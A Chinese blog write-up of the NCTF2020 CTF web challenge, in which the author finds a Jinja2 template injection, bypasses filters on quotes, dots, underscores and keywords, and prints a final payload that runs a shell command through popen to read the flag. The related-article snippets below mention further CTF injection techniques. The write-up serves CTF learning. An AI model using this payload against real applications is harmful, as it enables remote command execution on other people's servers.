NCTF2020 你就是我的master吗

最新推荐文章于 2021-11-29 21:23:20 发布
最新推荐文章于 2021-11-29 21:23:20 发布
阅读量758 收藏
点赞数
分类专栏: 模板注入SSTI 文章标签: SSTI python WEB 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rfrder/article/details/109967498
版权

前言

第一次参加南邮的NCTF,表示题目出的质量很好,出题人也很好,平台也很好,交flag也不需要验证码(逃~),总的来说就是好,明年还会参加。

见证了过了1天PWN仍然0解的状况,南邮的PWN还是强啊。

总榜第一队伍里的师傅还是强啊,但是为什么是梅子酒不是郁离歌呢?(逃~):
在这里插入图片描述

Web题目的质量还是挺高的,虽然我不会。。。今年只能做出来最简单的那道SSTI,争取明年能再创新高。。

WP

F12看源码,发现了?name=master,url传一下发现回显了,大概率是SSTI,经过测试是Jinja2的SSTI,然后正常注入,发现过滤了一些一般的payload中所需要的东西:

  • 过滤了单引号,用双引号来绕过
  • 过滤了点 . ,用[]来绕过
  • 过滤了下划线_,用\x5f来绕过
  • 过滤了class,base,subclasses这些,用+进行字符串的拼接来绕过。

最终的payload如下:

?name={{""["\x5f\x5fcla"+"ss\x5f\x5f"]["\x5f\x5fba"+"se\x5f\x5f"]["\x5f\x5fsubcl"+"asses\x5f\x5f"]()[117]["\x5f\x5fin"+"it\x5f\x5f"]["\x5f\x5fgl"+"obals\x5f\x5f"]["po"+"pen"]("cat wo\x5fta\x5fniang\x5fde\x5fbu\x5fshi\x5fni\x5fde\x5ffla9")["read"]()}}

总结

前一篇博客刚说过不水博客,结果又水了一篇。。。虽然这题已经被日穿了,谁让自己只会这题呢。。。

bfengj
关注
专栏目录
NCTF-Writeup
Yukikaze_cxy
05-30 1705
南京邮电大学网络攻防训练平台https://cgctf.nuptsast.com以下按本人做题的顺序排序剩余题目待补完。。。【Web】1.签到题nctf{flag_admiaanaaaaaaaaaaa}网页源码2.单身二十年nctf{yougotit_script_now}由于页面自动跳转,使用工具查看search_key.php页面源码即可3.SQL注入1nctf{ni_ye_hui_sql?}...
NCTF RE
weixin_43225801的博客
12-02 473
16bit 16进制的汇编阅读训练。汇编贼烦,还好师傅手下留情,逻辑段一点不复杂,拖进ida//ida牛逼,查看start函数,跟到sub_100ac下面,看的出来这个是主函数 mov di, 3 call sub_10115 mov di, 24h ; ‘$’ call sub_10123 mov bx, 24h ; ‘$’//输入 add bx, 1 cmp ...
NCTF2020 web 你就是我的master
weixin_43610673的博客
11-22 472
周末水了一题 之前ssti的题都是直接用网上payload改的,这题由于环境差异 自己过了一遍流程 白嫖惯了还挺不习惯的 哈哈 页面内容随name参数值而改变,根据容器名称猜测为flask/jinjia2框架模板注入,验证确认为模板注入 用burp fuzz 下过滤了什么特殊符号class base mro config args init global等常用关键字也被过滤 Bypass就行 ’ 单引号用 " 双引号代替,_ 下划线用16进制的 \x5f 代替 . 点符号以及关键字被过滤用拼接绕过如[
CTFre-V&NCTF2020-strangeCpp
weixin_43046297的博客
05-15 667
https://buuoj.cn/challenges#[V&N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B]strangeCpp 先使用一下exe,发现是貌似检测系统环境变量的程序 然后放入ida,定位一下他这个程序的主函数 可以看到引用了很多字符串,看一下他引用的字符串的位置: 然后有一个细节值得我们注意,那就是byte_140021008这段字符串被跳过去了,被一个很可疑的函数sub_140013580引用,我们跟踪进去看一下 其实根.
[NCTF2020]babyRSA Writeup
bestkasscn的博客
11-29 506
[NCTF2020]babyRSA 题目描述 from Crypto.Util.number import * from flag import flag def nextPrime(n): n += 2 if n & 1 else 1 while not isPrime(n): n += 2 return n p = getPrime(1024) q = nextPrime(p) n = p * q e = 0x10001 d = inverse(e,
V&NCTF2020 CSRe
__ys的博客
03-30 147
CSRe 查壳 .NET文件,但打开后发现被混淆 用de4dot去混淆 在de4dot所在文件夹中打开cmd输入 .De4Dot 目标文件所在位置 生成的-cleaned文件即为去混淆后的文件 用dnSpy打开分析 找到与flag相关的代码进行分析 经过分析可知进行两次sha1解密后即可得到flag(在线解密网站) flag{1415turn} ...
BUUCTF V&N2020 公开赛 Misc(复现)
LYJ20010728的博客
08-10 636
BUUCTF V&N2020 公开赛 Misc(复现)真·签到拉胯的三条命令ML 第一步内存取证Final Game 真·签到 CV大法题 Flag:flag{welcome_to_vn} 拉胯的三条命令 根据说明文档中的内容,可以发现流量包应该是和Nmap扫描有关 参考文章:https://www.hackingarticles.in/understanding-nmap-scan-wireshark/ 找到相关端口号:3306、22、21、801、631 Flag:flag
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
[NCTF2019]Sore
2er0!=O的博客
08-01 904
[NCTF2019]Sore 附件: ciphertext.txt: nsfAIHFrMuLynuCApeEstxJOzniQuyBVfAChDEznppfAiEIDcyNFBsCjsLvGlDtqztuaHvHbCmuyGNsIMhGlDtbotCoDzDjhyBzHGfHGfoHsuhlssIMvwlixBHHGfDRjoCKrapNIwqNyuxIBACQhtMwCmMCfEBpsrzEuiLGBoMipTkxrznoHfAkqwzvxuzCzDbLyApCGvjpqxkuwpgsLrqsVfCRw
esp32 micropython ssd1306 中文显示
11-15
群里大神指点做出的第一个项目,可完美显示中文,包中附带字符工具, 字符制作要求:阴码,列行式,16,16,逆向,十六进制数,C51 函数表达式: #函数名称:LcdShowCh_16x16() #输入参数:n:第几个中文字符, x_axis:显示的x位置, y_axis:显示的y位置 #输出参数:无 #程序说明:lcd显示16X16汉字
2020/7/10 -[NCTF2019]Fake XML cookbook - xxe/最简单的外部实体注入
抒情诗
07-10 388
这是最简单的外部实体注入了,只需要增加一点就行了 文章目录1.burp拦截后直接注入2.使用下面的payload直接cat /flag 1.burp拦截后直接注入 POST /doLogin.php HTTP/1.1 Host: 26242ca5-5403-4513-8ab4-39f7d6161116.node3.buuoj.cn User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept:
2020/7/07 - [NCTF2019]True XML cookbook - xxe
抒情诗
07-08 697
我准备发两份,一份发到这里,另一份发到CSDN上面,这里的内容浏览器不好搜到,别人看不到,无趣 第二道xxe类型的题了。Content-Type: application/xml;charset=utf-8看看这熟悉的内容,好吧,第一道payload为 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE user [ <!ENTITY xxe SYSTEM "./flag.txt"> ]> <user><
Writeup of NCTF
风沐白的岚
08-07 1682
南京邮电大学网络攻防训练平台 md5 collision <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else { e
Nctf2019 pwn
doudoudedi
11-24 694
没啥好说的自己菜 就做了三个 hello_pwn 没啥好说了直接连 from pwn import * local=1 p=remote('139.129.76.65',50003) p.interactive() pwn me 100 years! (Ⅰ) 00截断然后直接覆盖 from pwn import * p=remote('139.129.76.65',50004) #p=proce...
nctf-web
电风
03-30 2424
1:你从哪里来 你是从 google 来的吗? http://115.28.150.176/referer/index.php BP截包 看到referer这里修改如下 Repeater->go 返回flag,网页显示如下: 2单身一百年也没用 传送门:biu~ http://chinalover.sinaapp.com/web9/ 题目提示到这里找KEY,点击KEY链接, 显示
NCTF 2019 Re Writeup(四题)
siphre
11-25 938
reverse 一、DEBUG ELF动态调试,flag长度24字节,用户输入的字符串跟经过处理后的字符串s做校验。因为变量s是经过处理的,得在cmp dl,al下断看eax寄存器的值,可以看到最终比较的时候s的值。 手抄s的值出来,再python翻译成字符串即可。 flag=[0x4E,0x43,0x54,0x46,0x7b,0x6a,0x75,0x73,0x74,0x5f,0x6...
nctf-密码
电风
03-30 3531
1…….KeyBoard 题目提示:看键盘看键盘看键盘! ytfvbhn tgbgy hjuygbn yhnmki tgvhn uygbnjm uygbn yhnijm直接在键盘上画出来,没有什么规律,只是一串字母 一目了然:areuhack2……base64全家桶R1pDVE1NWlhHUTNETU4yQ0dZWkRNTUpYR00zREtNWldHTTJES 1JSV0dJM0RDTlpU
第二届“强网杯”全国网络安全挑战赛WRITE-UP
郁离歌丶的博客
03-27 2579
周末打了一下QWB去看神仙打架23333333萌新我勉强苟进了前200,废话不多说了,还是太菜了。努力!WEBweb签到这个题有三层,过三关得flag。第一层param1[]=1&amp;param2[]=2第二层param1[]=1&amp;param2[]=2第三层使用MD5碰撞生日攻击参考链接:http://www.freebuf.com/articles/network/48015.htm...
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过不断尝试不同的字符,构造SQL语句进行盲注,判断是否成功绕过过滤。引用\[3\]提供了一个Python脚本的示例,可以用来自动化进行尝试。该脚本通过构造不同长度的payload,逐位尝试密码的每一位字符,直到获取到完整的密码。 #### 引用[.reference_title] - *1* [[NCTF2019]SQLi --BUUCTF --详解](https://blog.csdn.net/l2872253606/article/details/125265138)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[NCTF2019]SQLi(Regexp注入)](https://blog.csdn.net/weixin_45669205/article/details/116137824)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[NCTF2019]SQLi](https://blog.csdn.net/shinygod/article/details/124100832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值